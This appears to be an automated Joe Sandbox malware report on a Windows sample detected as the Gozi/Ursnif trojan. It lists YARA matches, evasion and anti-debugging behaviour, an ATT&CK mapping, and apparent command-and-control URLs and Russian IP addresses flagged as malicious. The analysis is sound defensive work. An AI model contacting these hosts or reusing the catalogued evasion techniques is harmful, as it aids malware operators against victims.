      Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_00412E5E0_2_00412E5E
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_004129C90_2_004129C9
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_004135CE0_2_004135CE
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_004131FC0_2_004131FC
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_004139B60_2_004139B6
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: KOYCdGz80D.exeVirustotal: Detection: 52%
      Source: KOYCdGz80D.exeReversingLabs: Detection: 48%
      Source: KOYCdGz80D.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_008256A5 CreateToolhelp32Snapshot,Module32First,0_2_008256A5
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeUnpacked PE file: 0.2.KOYCdGz80D.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeUnpacked PE file: 0.2.KOYCdGz80D.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_00418A30 pushfd ; retf 0042h0_2_00418A31
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_00827AAD push 8B8751D0h; retf 0_2_00827AB2
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_0082D8D3 push ds; ret 0_2_0082D8E1
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_0082CE7A push ebp; ret 0_2_0082CE7F
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_0082D558 push ds; ret 0_2_0082D559
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Found evasive API chain (may stop execution after checking system information)
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_0-4895
      Source: C:\Users\user\Desktop\KOYCdGz80D.exe TID: 5712Thread sleep count: 90 > 30Jump to behavior
      Source: C:\Users\user\Desktop\KOYCdGz80D.exe TID: 5712Thread sleep count: 58 > 30Jump to behavior
      Source: C:\Users\user\Desktop\KOYCdGz80D.exe TID: 5712Thread sleep count: 59 > 30Jump to behavior
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeAPI call chain: ExitProcess graph end nodegraph_0-4888
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWto4 Adapter
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

      Anti Debugging

      barindex
      Found API chain indicative of debugger detection
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-4895
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_00824F82 push dword ptr fs:[00000030h]0_2_00824F82
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00410C7F
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,0_2_004118DB
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: __crtGetLocaleInfoA_stat,0_2_004154FA
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,0_2_0041089B
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0

      Stealing of Sensitive Information

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation      		Path InterceptionPath Interception11
      Virtualization/Sandbox Evasion      		1
      Input Capture      		1
      System Time Discovery      		Remote Services1
      Input Capture      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts11
      Native API      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Obfuscated Files or Information      		LSASS Memory11
      Security Software Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth1
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
      Software Packing      		Security Account Manager11
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Remote System Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials114
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      KOYCdGz80D.exe52%VirustotalBrowse
      KOYCdGz80D.exe49%ReversingLabsWin32.Trojan.Generic
      KOYCdGz80D.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      0.2.KOYCdGz80D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
      0.2.KOYCdGz80D.exe.640000.2.unpack100%AviraHEUR/AGEN.1245293Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://94.103.183.153/ws100%Avira URL Cloudmalware
      http://94.103.183.153/drew/ZPHuUA_2/FprSm4ZnZ_2BAzE0dNANwbe/iluX9tql3G/HloTTZMt_2B0yd_2F/E7gfm_2FdCi100%Avira URL Cloudmalware
      http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk100%Avira URL Cloudmalware
      http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/100%Avira URL Cloudmalware
      http://94.103.183.153/100%Avira URL Cloudmalware
      http://62.173.142.51/100%Avira URL Cloudmalware
      http://94.1030%Avira URL Cloudsafe
      http://62.173.142.51/2%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      checklist.skype.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlktrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://checklist.skype.com/drew/3PKTGV3tNzaVLTkq/t_2Fk5P4Y6K9Qzr/6RM6HLfcw_2BRzYyd_/2FngDszCZ/8rosltKOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://62.173.142.51/KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000878000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
          • 2%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://94.103.183.153/wsKOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://94.103.183.153/drew/ZPHuUA_2/FprSm4ZnZ_2BAzE0dNANwbe/iluX9tql3G/HloTTZMt_2B0yd_2F/E7gfm_2FdCiKOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509156874.0000000000809000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://checklist.skype.com/6WkbUYRz/dPSG7YZOtAhk9jZCO3fKOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://94.103.183.153/KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://94.103KOYCdGz80D.exe, 00000000.00000002.509470240.000000000229C000.00000004.00000010.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		low
            http://checklist.skype.com/drew/3PKTGV3tSKOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              62.173.142.51
              		unknownRussian Federation
              		34300SPACENET-ASInternetServiceProviderRUtrue
              94.103.183.153
              		unknownRussian Federation
              		197390RATELE-ASRUfalse

              General Information

              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:826246
              Start date and time:2023-03-14 14:58:14 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 29s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:KOYCdGz80D.exe
              Original Sample Name:d09f787a952a6e946656ac9184768fbe.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/0@1/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 5.2% (good quality ratio 5.2%)
              • Quality average: 89%
              • Quality standard deviation: 15.4%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 15
              • Number of non-executed functions: 7
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              62.173.142.51server.exeGet hashmaliciousUrsnif, CryptOneBrowse
                server.exeGet hashmaliciousUrsnifBrowse
                  server.exeGet hashmaliciousUrsnifBrowse
                    server.exeGet hashmaliciousUrsnifBrowse
                      94.103.183.153server.exeGet hashmaliciousUrsnif, CryptOneBrowse
                        server.exeGet hashmaliciousUrsnifBrowse
                          server.exeGet hashmaliciousUrsnifBrowse

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            SPACENET-ASInternetServiceProviderRUserver.exeGet hashmaliciousUrsnif, CryptOneBrowse
                            • 62.173.142.51
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.142.51
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.142.51
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.142.51
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.236
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.236
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.140.236
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.141.36
                            server.exeGet hashmaliciousUrsnifBrowse
                            • 62.173.141.36
